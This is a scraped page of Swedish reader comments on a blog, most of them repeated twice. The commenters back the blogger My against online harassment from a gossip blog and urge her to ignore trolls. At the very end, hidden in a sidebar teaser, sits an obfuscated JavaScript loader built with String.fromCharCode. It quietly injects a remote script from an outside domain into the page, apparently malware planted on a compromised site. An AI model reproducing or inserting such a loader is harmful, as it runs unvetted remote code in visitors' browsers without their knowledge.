  Varför vissa vuxna människor mobbar kan jag inte förstå!!! Men troligt är att det handlar om att dom har ett väldigt tråkigt liv & söker uppmärksamhet genom att begå vad jag tycker är en kriminell handling…Genom att de faktiskt tillfogar en annan människa skada & kommer undan pga att de gömmer sig anonymt bakom en skärm.
  Dessa vuxna människor borde skämmas som lär allas våra barn att fortsätta behandla andra illa det är INTE OK!!!
  Vad vinner dessa så kallade medmänniskor utan respekt & empati för andra människor på detta skulle jag vilja veta skaffa sig ett eget liv istället???
  Fortsätt göra det DU gör DU gör det superbra?✌???
  DU ÄR STARK SOM VÅGAR STÅ UPP & SÄGA ATT DETTA ÄR INTE OK??????
  Massa kryakramar till dig My?

 56. Dessa hemska människor som Alltid är anonyma och inte lever i vetkligheten, som lever av och frodas av att ”sänka” och förstöra för andra är inga du ska ägna en enda tanke. Det är människor som är bittra och så missnöjda med sina egna liv o tillvaro. Har själv drabbats och drabbas fortfarande. Men Vet ju vem jag är och tar inte åt mig det minsta. Det ska inte du heller göra. Lev ditt liv precis hur du vill My, och njut! Njut av alla fina du har runt dig, kärleken, din familj. ♥️

 57. Bryr dig inte om att nämna vad andra skriver till dig på din blogg. För då matar du bara bloggbevakaren och nätrollen. Som många andra också har skrivit redan, varför ta du alltid upp allt gammalt hela tiden i din blogg. Det blir sån upprepning för oss läsare.
  Vet inte vad du tycker om Johanna Toftby men hennes blogg är inspirerande. Lika så Magdalena Graaf mfl.

 58. Styrkekram till dig fina My✨💕💖💕✨
  Tycker du är en fantastiskt mamma & förebild👏🏻
  Varför vissa vuxna människor mobbar kan jag inte förstå!!! Men troligt är att det handlar om att dom har ett väldigt tråkigt liv & söker uppmärksamhet genom att begå vad jag tycker är en kriminell handling…Genom att de faktiskt tillfogar en annan människa skada & kommer undan pga att de gömmer sig anonymt bakom en skärm.
  Dessa vuxna människor borde skämmas som lär allas våra barn att fortsätta behandla andra illa det är INTE OK!!!
  Vad vinner dessa så kallade medmänniskor utan respekt & empati för andra människor på detta skulle jag vilja veta skaffa sig ett eget liv istället???
  Fortsätt göra det DU gör DU gör det superbra😃✌🏻🌟💛
  DU ÄR STARK SOM VÅGAR STÅ UPP & SÄGA ATT DETTA ÄR INTE OK👊🏻👊🏻👊🏻
  Massa kryakramar till dig My💞

 59. Finaste My ❤️
  Bli uppriktigt ledsen över att återigen läsa om den ”svenska” avundsjukan ?
  Att det finns så hemska & elaka människor?
  Du är en helt fantastisk människa som delar med dig av både positiva & negativa händelser från ditt liv, en sådan förebild för oss alla som kämpar med div. saker/händelser. Du visar att man kan finna styrkan i sitt förgångna, du visar att det är en styrka att visa att man faktiskt får vara svag❤️
  All heder till dig som kämpar & jag hoppas innerligt att även de där nättrollen vaknar upp från sina drömvärlden & släpper på sin avundsjuk & faktiskt förstår vad det är du förmedlar ❤️
  All styrka & kärlek till dig ❤️
  Va nu rädd om dig & vila vila vila efter din operation ❤️
  Kram Minna ❤️

 60. Har läst kommentarerna på den ursäkta mitt språk men skit bloggen, hur man nu ens kan kalla det en blogg? Det som skrivs där är förtal och skitsnack. Hur kan man anmäla en blogg för att den finns är ett frågetecken för mig. Och en annan sak som jag inte förstår är hur orkar folk gå in och skriva en massa skit bland kommentarerna. Har folk inget att göra? bry dig inte om vad som skrivs där, du verkar vara en super fin person och du ska inte ta skit. Vad var och en väljer att göra med sin kropp är ens egna val. Jag har opererat mig hos Tuve Mårtensson på reformkliniken och jag rekommenderar honom för alla jag känner och det gör man för att man är nöjd och vill att andra ska få uppnå samma fina resultat som jag gjort! Lycka till med allt och återigen försök stänga av vad andra människor skriver! Kram <3

 61. Finaste My ❤️
  Bli uppriktigt ledsen över att återigen läsa om den ”svenska” avundsjukan 😥
  Att det finns så hemska & elaka människor😥
  Du är en helt fantastisk människa som delar med dig av både positiva & negativa händelser från ditt liv, en sådan förebild för oss alla som kämpar med div. saker/händelser. Du visar att man kan finna styrkan i sitt förgångna, du visar att det är en styrka att visa att man faktiskt får vara svag❤️
  All heder till dig som kämpar & jag hoppas innerligt att även de där nättrollen vaknar upp från sina drömvärlden & släpper på sin avundsjuk & faktiskt förstår vad det är du förmedlar ❤️
  All styrka & kärlek till dig ❤️
  Va nu rädd om dig & vila vila vila efter din operation ❤️
  Kram Minna ❤️

 62. Har läst kommentarerna på den ursäkta mitt språk men skit bloggen, hur man nu ens kan kalla det en blogg? Det som skrivs där är förtal och skitsnack. Hur kan man anmäla en blogg för att den finns är ett frågetecken för mig. Och en annan sak som jag inte förstår är hur orkar folk gå in och skriva en massa skit bland kommentarerna. Har folk inget att göra? bry dig inte om vad som skrivs där, du verkar vara en super fin person och du ska inte ta skit. Vad var och en väljer att göra med sin kropp är ens egna val. Jag har opererat mig hos Tuve Mårtensson på reformkliniken och jag rekommenderar honom för alla jag känner och det gör man för att man är nöjd och vill att andra ska få uppnå samma fina resultat som jag gjort! Lycka till med allt och återigen försök stänga av vad andra människor skriver! Kram <3

 63. Det är svårt att vara en offentlig person, alla klarar inte av det. Viktigaste är att man klarar av den offentliga sidan, och sen ha ett privat liv också. Tar man åt sig ska man fundera två gånger om det är värt det, och förstör det nattsömnen så ska man nog sluta. Det finns nog ett liv också fast man inte är offentlig.

 64. Kan väl heller inte vara så bra för ditt framtida mäklarjobb att du kommer ut i sådana här oändliga diskussioner på din blogg måste nog bli en lugnare approach om de två jobben ska hänga ihop.
  Ja vem vann den där tävlingen du skulle ju tala om det i helgen tyckte jag du skrev.

 65. Det är svårt att vara en offentlig person, alla klarar inte av det. Viktigaste är att man klarar av den offentliga sidan, och sen ha ett privat liv också. Tar man åt sig ska man fundera två gånger om det är värt det, och förstör det nattsömnen så ska man nog sluta. Det finns nog ett liv också fast man inte är offentlig.

 66. Kan väl heller inte vara så bra för ditt framtida mäklarjobb att du kommer ut i sådana här oändliga diskussioner på din blogg måste nog bli en lugnare approach om de två jobben ska hänga ihop.
  Ja vem vann den där tävlingen du skulle ju tala om det i helgen tyckte jag du skrev.

 67. Tycker din blogg är bra My! Vill man inte läsa den kan man ju låta bli. Du är en fantastisk mamma och matte till dina katter. Förstår inte detta hat på nätet…dessa människor som är elaka och hatiska är avundsjuka människor som behöver hjälp!
  Kram My och ta hand om dig

 68. Har följt My ganska länge och alltid känt att jag backar henne. Det var jag som bad CamCam om peppinlägget till My när hon hade det extra jävligt, tyvärr utmynnade även det i massor av näthat. Hon har ju haft ett helt helvete på många sätt och står ändå ganska stark nu (skör/stark kanske man ska säga) .Vad är problemet med er andra? Varför så elaka? Vad får ni ut av det?
  Jag har ingen koll på några tidigare bråk med bloggvänner osv, men sedan jag började följa (precis innan konkursen) My så har hon skrivit väldigt öppet om
  Konkursen
  Ångesten
  Panikångesten
  Stressen
  Mammarollen
  Öland
  Lilleman
  Djuren
  Jobben
  Utbildningar
  Är faktiskt sjukt imponerad över att hon orkar med pendlandet och alla projekt. Det finns ganska många skilda föräldrar som inte hade pallat det.
  Alla får såklart ha vilken åsikt de vill, men måste man verkligen gå in för att såra någon så hårt? Tycker att det är jävligt orättvist mot My faktiskt.

 69. Tycker din blogg är bra My! Vill man inte läsa den kan man ju låta bli. Du är en fantastisk mamma och matte till dina katter. Förstår inte detta hat på nätet…dessa människor som är elaka och hatiska är avundsjuka människor som behöver hjälp!
  Kram My och ta hand om dig

 70. Har följt My ganska länge och alltid känt att jag backar henne. Det var jag som bad CamCam om peppinlägget till My när hon hade det extra jävligt, tyvärr utmynnade även det i massor av näthat. Hon har ju haft ett helt helvete på många sätt och står ändå ganska stark nu (skör/stark kanske man ska säga) .Vad är problemet med er andra? Varför så elaka? Vad får ni ut av det?

  Jag har ingen koll på några tidigare bråk med bloggvänner osv, men sedan jag började följa (precis innan konkursen) My så har hon skrivit väldigt öppet om
  Konkursen
  Ångesten
  Panikångesten
  Stressen
  Mammarollen
  Öland
  Lilleman
  Djuren
  Jobben
  Utbildningar

  Är faktiskt sjukt imponerad över att hon orkar med pendlandet och alla projekt. Det finns ganska många skilda föräldrar som inte hade pallat det.

  Alla får såklart ha vilken åsikt de vill, men måste man verkligen gå in för att såra någon så hårt? Tycker att det är jävligt orättvist mot My faktiskt.

 71. Du ska hålla huvudet högt och fundera på vad privat betyder. Sätta gränser.
  Man måste inte berätta allt.
  Kan kan du skriva dagbok bara för dig själv om allt du gått igenom?
  Ska du bli en välrenommerad mäklare måste du styra upp bloggen.
  Läs inte på flash/CAM CAM.
  Kurera dig nu i lugn och ro och en paus från sociala medier är inte farligt!

 72. Du ska hålla huvudet högt och fundera på vad privat betyder. Sätta gränser.

  Man måste inte berätta allt.

  Kan kan du skriva dagbok bara för dig själv om allt du gått igenom?

  Ska du bli en välrenommerad mäklare måste du styra upp bloggen.

  Läs inte på flash/CAM CAM.

  Kurera dig nu i lugn och ro och en paus från sociala medier är inte farligt!

 73. Hej fina My! Hoppas läkningen av operationen går bra, lycka till till både dig och Anna! Vilken fin pojkvän du har, kul att se ?. Jag har följt dig ganska länge, och kommenterat ibland när jag känt för det, och har alltid varit positiv, tycker du är en stark, vacker och klok kvinna, som alltid sätter din lilla son i första hand ? Jag unnar dig allt gott, för även om jag inte känner dig ( förstås) förutom genom din blogg, så gillar jag dig! Du är kvinnlig, stark, moderlig, vacker, samtidigt som du kan visa dig skör. MEN vad jag hoppas att du inte bemöter alla skitkommentarer, elaka påhopp, skvaller, lögner , avundsjuka m.m. Du utsätter dig tyvärr bara för mer skit, och jag önskar att du slipper det. Många har gett kloka råd i kommentarerna ovan, håller med de som skriver att enda sättet att få lite lugn, är att ignorera det helt. Nej, det är ABSOLUT inte OK att skriva som det görs vad gäller förtal. lögner, dynga på bl a bloggbevakning ( sicken skitblogg ??!!) men det GÖDER bara dessa patetiska småskitar att se att du blir ledsen, tar åt dig, försöker förklara eller säga ifrån. Jag är medveten om att det är din blogg, och du skriver naturligtvis precis om vad du vill och hur du vill, men jag tror att det klokaste du kan göra i den här soppan, är att bara fortsätta skriva som du vill, men också bestämma dig till 100 % att aldrig någonsin mer förklara,försvara eller kommentera skit tillbaka…Vi som följer dig ( och andra ) bloggare förstår mycket av sanningar / osanningar av oss själva, då de flesta, tack och lov, är ganska vettiga och sansade personer. Men den lilla mobben, hatklicken, ÄLSKAR drama, ju smaskigare och taskigare, desto bättre verkar det vara i deras värld. Så snälla, rara, goa, fina du, bryt det här mönstret, och behandla skiten iskallt, det retar upp dem allra mest ! Och det är bara av ren omtanke om dig, din familj och din sinnesro. Stor kram, ha en härlig helg !! ?

 74. Jag va inne o kikade på cam cams sida och ja alltså herregud en sån fruktansvärd person…. är det en privat person? Eller anställd? Hur som så är det bara så vidrigt, förstår inte hur det är möjligt att någon håller på sådär. Hur f*n kan folk va så bittra och elaka? Sover dom gott om natten när de skriver sånt här? Väldigt ofta är det kvinnor som är så elaka mot andra kvinnor, konstigt tycker jag hur man liksom får näring av att bete sig illa….men egentligen så är de små små människor som mår eländigt. Blir bara mer och mer genomruttna ju mer de håller på. Nä vet du vad My skit i alla de där patetiska människorna speciellt ”camcam” du står över dem! Jag tror starkt på karma gör gott och få gott!!
  Kram på dig, fortsätt vara dig själv.

 75. Hej fina My! Hoppas läkningen av operationen går bra, lycka till till både dig och Anna! Vilken fin pojkvän du har, kul att se :). Jag har följt dig ganska länge, och kommenterat ibland när jag känt för det, och har alltid varit positiv, tycker du är en stark, vacker och klok kvinna, som alltid sätter din lilla son i första hand 🙂 Jag unnar dig allt gott, för även om jag inte känner dig ( förstås) förutom genom din blogg, så gillar jag dig! Du är kvinnlig, stark, moderlig, vacker, samtidigt som du kan visa dig skör. MEN vad jag hoppas att du inte bemöter alla skitkommentarer, elaka påhopp, skvaller, lögner , avundsjuka m.m. Du utsätter dig tyvärr bara för mer skit, och jag önskar att du slipper det. Många har gett kloka råd i kommentarerna ovan, håller med de som skriver att enda sättet att få lite lugn, är att ignorera det helt. Nej, det är ABSOLUT inte OK att skriva som det görs vad gäller förtal. lögner, dynga på bl a bloggbevakning ( sicken skitblogg ??!!) men det GÖDER bara dessa patetiska småskitar att se att du blir ledsen, tar åt dig, försöker förklara eller säga ifrån. Jag är medveten om att det är din blogg, och du skriver naturligtvis precis om vad du vill och hur du vill, men jag tror att det klokaste du kan göra i den här soppan, är att bara fortsätta skriva som du vill, men också bestämma dig till 100 % att aldrig någonsin mer förklara,försvara eller kommentera skit tillbaka…Vi som följer dig ( och andra ) bloggare förstår mycket av sanningar / osanningar av oss själva, då de flesta, tack och lov, är ganska vettiga och sansade personer. Men den lilla mobben, hatklicken, ÄLSKAR drama, ju smaskigare och taskigare, desto bättre verkar det vara i deras värld. Så snälla, rara, goa, fina du, bryt det här mönstret, och behandla skiten iskallt, det retar upp dem allra mest ! Och det är bara av ren omtanke om dig, din familj och din sinnesro. Stor kram, ha en härlig helg !! 🙂

 76. Jag va inne o kikade på cam cams sida och ja alltså herregud en sån fruktansvärd person…. är det en privat person? Eller anställd? Hur som så är det bara så vidrigt, förstår inte hur det är möjligt att någon håller på sådär. Hur f*n kan folk va så bittra och elaka? Sover dom gott om natten när de skriver sånt här? Väldigt ofta är det kvinnor som är så elaka mot andra kvinnor, konstigt tycker jag hur man liksom får näring av att bete sig illa….men egentligen så är de små små människor som mår eländigt. Blir bara mer och mer genomruttna ju mer de håller på. Nä vet du vad My skit i alla de där patetiska människorna speciellt ”camcam” du står över dem! Jag tror starkt på karma gör gott och få gott!!
  Kram på dig, fortsätt vara dig själv.

 77. Bloggen är ditt jobb och då får man nog tyvärr vara beredd på att få både ros och ros. Tänk dig att du jobbar inom kundservice för ett större bolag. Du är ansiktet utåt som möter kunden. Du kommer att stöta på folk som både berömmer bolaget men även massa skit som du egentligen inte rår för eller som kanske inte heller är sant. För att du är ansiktet utåt. Så är det inom många jobb. Även som bloggerska.
  Här kan man välja att inte gå igång på sånt. Man vet sitt värde, man vet vad man gör och har gjort. Skulle aldrig falla mig in att gå i svaromål mot kunder eller i ditt fall läsare. De som gillar dig fortsätter läsa och de som inte gör det kommer inte att ändra sig attityd pga dina ”försvarsinlägg”. Det är inte kul det förstår jag. Men inom alla jobb förekommer detta och man väljer hur man låter kritik komma åt en eller inte.
  Jag tror i ditt fall My att du inte borde gett bloggbevakning mer reklam utan att faktiskt lägga locket på. Ventilera med Jonas och dina vänner. Men håll blohgen fri från konflikter.

  • Kritik och anklagelser/anmälningar emot mig som mamma, som PT osv…. det känns inte riktigt som samma sak. Jag har varit tyst och lagt locket på i månader….. utan större framgång…

   • Tror på att ta de med dem de berör. Hot ska tex polisanmälas. Jag tror du måste ta det i det forum där det ger effekt. Och hålla bloggen fri från konflikter. Kritik får man nog tyvärr räkna med om man öppnar upp sitt privatliv. Men du vet ju ändå att du duger som mamma och din lilleman vet det.
    Du har ju tagit upp detta ämne ett flertal gånger och det har ändå fortsatt så det kanske är dags att välja en annan strategi. Din blogg är ditt varumärke och du har också valet att välja vad som ska släppas igenom. Vad andra skriver på sina bloggar kan du inte styra över men du kan välja hur du förhåller dig till det. Du kan välja att ha din blogg fri från konflikter. Du kan välja att inte nämna vad bloggbevakning skriver för att ge mer trafik in på hennes blogg.

 78. Bloggen är ditt jobb och då får man nog tyvärr vara beredd på att få både ros och ros. Tänk dig att du jobbar inom kundservice för ett större bolag. Du är ansiktet utåt som möter kunden. Du kommer att stöta på folk som både berömmer bolaget men även massa skit som du egentligen inte rår för eller som kanske inte heller är sant. För att du är ansiktet utåt. Så är det inom många jobb. Även som bloggerska.

  Här kan man välja att inte gå igång på sånt. Man vet sitt värde, man vet vad man gör och har gjort. Skulle aldrig falla mig in att gå i svaromål mot kunder eller i ditt fall läsare. De som gillar dig fortsätter läsa och de som inte gör det kommer inte att ändra sig attityd pga dina ”försvarsinlägg”. Det är inte kul det förstår jag. Men inom alla jobb förekommer detta och man väljer hur man låter kritik komma åt en eller inte.
  Jag tror i ditt fall My att du inte borde gett bloggbevakning mer reklam utan att faktiskt lägga locket på. Ventilera med Jonas och dina vänner. Men håll blohgen fri från konflikter.

  • Kritik och anklagelser/anmälningar emot mig som mamma, som PT osv…. det känns inte riktigt som samma sak. Jag har varit tyst och lagt locket på i månader….. utan större framgång…

   • Tror på att ta de med dem de berör. Hot ska tex polisanmälas. Jag tror du måste ta det i det forum där det ger effekt. Och hålla bloggen fri från konflikter. Kritik får man nog tyvärr räkna med om man öppnar upp sitt privatliv. Men du vet ju ändå att du duger som mamma och din lilleman vet det.
    Du har ju tagit upp detta ämne ett flertal gånger och det har ändå fortsatt så det kanske är dags att välja en annan strategi. Din blogg är ditt varumärke och du har också valet att välja vad som ska släppas igenom. Vad andra skriver på sina bloggar kan du inte styra över men du kan välja hur du förhåller dig till det. Du kan välja att ha din blogg fri från konflikter. Du kan välja att inte nämna vad bloggbevakning skriver för att ge mer trafik in på hennes blogg.

 79. Har följt din blogg under lång tid och kommer att fortsätta läsa den. Du är en otroligt stark tjej och fortsätt att vara den du är. Bry dig inte om alla elaka kommentarer. Vet att det är lätt att säga men förstår att det inte alltid är så lätt att bara strunta i. Hur du än gör så kommer folks avundsjuka alltid fram. Blev så glad att läsa om din stora kärlek. (Han är verkligen snygg). Det är dags att du också får känna lycka i ditt liv. Önskar dej fortsatt lycka.

 80. Har följt din blogg under lång tid och kommer att fortsätta läsa den. Du är en otroligt stark tjej och fortsätt att vara den du är. Bry dig inte om alla elaka kommentarer. Vet att det är lätt att säga men förstår att det inte alltid är så lätt att bara strunta i. Hur du än gör så kommer folks avundsjuka alltid fram. Blev så glad att läsa om din stora kärlek. (Han är verkligen snygg). Det är dags att du också får känna lycka i ditt liv. Önskar dej fortsatt lycka.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/